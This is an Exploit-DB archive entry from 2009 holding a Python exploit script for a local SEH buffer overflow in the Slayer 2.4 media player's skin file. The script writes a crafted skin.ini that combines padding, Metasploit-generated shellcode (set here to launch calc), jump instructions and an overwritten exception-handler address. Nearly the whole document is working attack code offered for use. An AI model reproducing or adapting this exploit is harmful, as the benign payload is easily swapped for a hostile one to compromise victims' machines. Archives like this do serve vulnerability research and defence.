Slayer 2.4 - 'skin' Universal Buffer Overflow (SEH)

EDB-ID:

8789

CVE:

N/A

Author:

SuNHouSe2

Type:

local

Platform:

Windows

Published:

2009-05-26

#!/usr/bin/python
print "**************************************************************************"
print "[~]Slayer v2.4 (skin) Universal Seh Overflow Exploit (SEH)\n"
print "[~]AUTHOR: SuNHouSe2 [ALGERIAN HaCkEr]\n"
print "[~]Email : sunhouse2@yahoo.com\n"
print "[~]HOME  : http://www.snakespc.com\n" 
print "[~]Tested on: Windows XP Pro SP3 (FR)\n"
print "[~]Special ThanX : His0k4,& ALL Snakespc.com Members\n"
print "**************************************************************************"       

import os

header1=(
"\x5b\x53\x43\x52\x45\x45\x4e\x5d\x0a\x4d\x61\x73\x6b\x3d\x2e\x2e\x2f\x61\x62\x64"
"\x2f\x6d\x61\x73\x6b\x2e\x62\x6d\x70\x0a\x4d\x61\x69\x6e\x3d\x2e\x2e\x2f\x61\x62"
"\x64\x2f\x6d\x61\x69\x6e\x2e\x6a\x70\x67\x0a\x44\x6f\x77\x6e\x3d\x2e\x2e\x2f\x61"
"\x62\x64\x2f\x53\x65\x6c\x65\x63\x74\x65\x64\x2e\x6a\x70\x67\x0a\x4f\x76\x65\x72"
"\x3d\x2e\x2e\x2f\x61\x62\x64\x2f\x4f\x76\x65\x72\x2e\x6a\x70\x67\x0a\x44\x69\x73"
"\x61\x62\x6c\x65\x64\x3d\x2e\x2e\x2f\x61\x62\x64\x2f\x6d\x61\x69\x6e\x2e\x6a\x70"
"\x67\x0a\x0a\x5b\x42\x55\x54\x54\x4f\x4e\x49\x4e\x46\x4f\x5d\x0a\x31\x3d")

header2=(
"\x2c\x33\x32\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x43\x6f\x6e\x66\x69\x67"
"\x75\x72\x61\x74\x69\x6f\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x32\x3d\x42\x5f\x56\x4f"
"\x42\x2c\x32\x39\x2c\x33\x31\x2c\x31\x34\x2c\x31\x35\x2c\x4c\x61\x6e\x67\x75\x61"
"\x67\x65\x20\x53\x65\x6c\x65\x63\x74\x69\x6f\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x33"
"\x3d\x42\x5f\x50\x4c\x41\x59\x4c\x49\x53\x54\x2c\x37\x30\x2c\x34\x39\x2c\x31\x34"
"\x2c\x31\x35\x2c\x50\x6c\x61\x79\x6c\x69\x73\x74\x2c\x46\x41\x4c\x53\x45\x0a\x34"
"\x3d\x42\x5f\x4d\x55\x54\x45\x2c\x36\x34\x2c\x37\x35\x2c\x31\x34\x2c\x31\x35\x2c"
"\x4d\x75\x74\x65\x2c\x46\x41\x4c\x53\x45\x0a\x35\x3d\x42\x5f\x46\x55\x4c\x4c\x53"
"\x43\x52\x45\x45\x4e\x2c\x37\x32\x2c\x32\x36\x2c\x31\x34\x2c\x31\x35\x2c\x46\x75"
"\x6c\x6c\x73\x63\x72\x65\x65\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x36\x3d\x42\x5f\x41"
"\x42\x4f\x55\x54\x2c\x33\x34\x2c\x38\x36\x2c\x31\x33\x2c\x31\x33\x2c\x41\x62\x6f"
"\x75\x74\x2c\x46\x41\x4c\x53\x45\x0a\x37\x3d\x42\x5f\x4f\x50\x45\x4e\x2c\x32\x39"
"\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x4f\x70\x65\x6e\x2c\x46\x41\x4c\x53"
"\x45\x0a\x38\x3d\x42\x5f\x43\x4c\x4f\x53\x45\x2c\x34\x32\x33\x2c\x35\x2c\x31\x32"
"\x2c\x31\x30\x2c\x43\x6c\x6f\x73\x65\x2c\x46\x41\x4c\x53\x45\x0a\x39\x3d\x42\x5f"
"\x50\x52\x45\x56\x2c\x32\x34\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x50\x72"
"\x65\x76\x69\x6f\x75\x73\x20\x43\x6c\x69\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x30"
"\x3d\x42\x5f\x4e\x45\x58\x54\x2c\x32\x37\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36"
"\x2c\x4e\x65\x78\x74\x20\x43\x6c\x69\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x31\x3d"
"\x42\x5f\x53\x54\x4f\x50\x2c\x32\x32\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c"
"\x53\x74\x6f\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x32\x3d\x42\x5f\x50\x4c\x41\x59"
"\x2c\x31\x39\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x50\x6c\x61\x79\x2c\x46"
"\x41\x4c\x53\x45\x0a\x0a\x5b\x50\x52\x4f\x47\x52\x45\x53\x53\x49\x4e\x46\x4f\x5d"
"\x0a\x31\x3d\x50\x52\x4f\x47\x52\x45\x53\x53\x5f\x50\x4f\x53\x2c\x2c\x31\x34\x39"
"\x2c\x37\x30\x2c\x32\x34\x34\x2c\x34\x2c\x56\x0a\x0a\x5b\x54\x45\x58\x54\x49\x4e"
"\x46\x4f\x5d\x0a\x31\x3d\x54\x45\x58\x54\x5f\x53\x4c\x41\x59\x45\x52\x2c\x41\x72"
"\x69\x61\x6c\x2c\x54\x52\x55\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x33\x2c\x38\x33"
"\x38\x38\x36\x30\x38\x2c\x31\x36\x30\x2c\x32\x35\x2c\x38\x30\x2c\x31\x35\x2c\x0a"
"\x32\x3d\x54\x45\x58\x54\x5f\x43\x4c\x49\x50\x5f\x4e\x41\x4d\x45\x2c\x41\x72\x69"
"\x61\x6c\x2c\x46\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36"
"\x37\x31\x31\x36\x38\x30\x2c\x31\x36\x31\x2c\x34\x30\x2c\x32\x31\x38\x2c\x31\x35"
"\x2c\x0a\x33\x3d\x54\x45\x58\x54\x5f\x50\x4f\x53\x2c\x41\x72\x69\x61\x6c\x2c\x46"
"\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36\x37\x31\x31\x36"
"\x38\x30\x2c\x32\x34\x30\x2c\x32\x35\x2c\x31\x36\x30\x2c\x31\x35\x2c\x0a\x34\x3d"
"\x54\x45\x58\x54\x5f\x43\x4c\x49\x50\x5f\x49\x4e\x46\x4f\x2c\x41\x72\x69\x61\x6c"
"\x2c\x46\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36\x37\x31"
"\x31\x36\x38\x30\x2c\x31\x36\x31\x2c\x35\x35\x2c\x35\x30\x2c\x31\x35\x2c\x0a\x35"
"\x3d\x54\x45\x58\x54\x5f\x54\x49\x50\x2c\x41\x72\x69\x61\x6c\x2c\x46\x41\x4c\x53"
"\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x32\x35\x35\x2c\x33\x30\x30\x2c\x35"
"\x35\x2c\x35\x30\x2c\x31\x35\x2c\x0a")

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e"
"\xc7\xd0\x3c\x83\xeb\xfc\xe2\xf4\xe2\x2f\x94\x3c\x1e\xc7\x5b\x79"
"\x22\x4c\xac\x39\x66\xc6\x3f\xb7\x51\xdf\x5b\x63\x3e\xc6\x3b\x75"
"\x95\xf3\x5b\x3d\xf0\xf6\x10\xa5\xb2\x43\x10\x48\x19\x06\x1a\x31"
"\x1f\x05\x3b\xc8\x25\x93\xf4\x38\x6b\x22\x5b\x63\x3a\xc6\x3b\x5a"
"\x95\xcb\x9b\xb7\x41\xdb\xd1\xd7\x95\xdb\x5b\x3d\xf5\x4e\x8c\x18"
"\x1a\x04\xe1\xfc\x7a\x4c\x90\x0c\x9b\x07\xa8\x30\x95\x87\xdc\xb7"
"\x6e\xdb\x7d\xb7\x76\xcf\x3b\x35\x95\x47\x60\x3c\x1e\xc7\x5b\x54"
"\x22\x98\xe1\xca\x7e\x91\x59\xc4\x9d\x07\xab\x6c\x76\x37\x5a\x38"
"\x41\xaf\x48\xc2\x94\xc9\x87\xc3\xf9\xa4\xb1\x50\x7d\xc7\xd0\x3c")

payload =  header1
payload += "\x41"*(348-len(shellcode))
payload += shellcode
payload += "\xE9\x5B\xFF\xFF\xFF"
payload += "\x90"*15
payload += "\xEB\xEA\xFF\xFF"
payload += "\x50\x37\x40"
payload +=  header2
try:
	os.mkdir("sunhouse")
	out_file = open(r'SuNHouSe/skin.ini', 'w')
	out_file.write(payload)
	out_file.close()
	raw_input("\nExploit file created!\n")
except:
    print "Error"

# milw0rm.com [2009-05-26]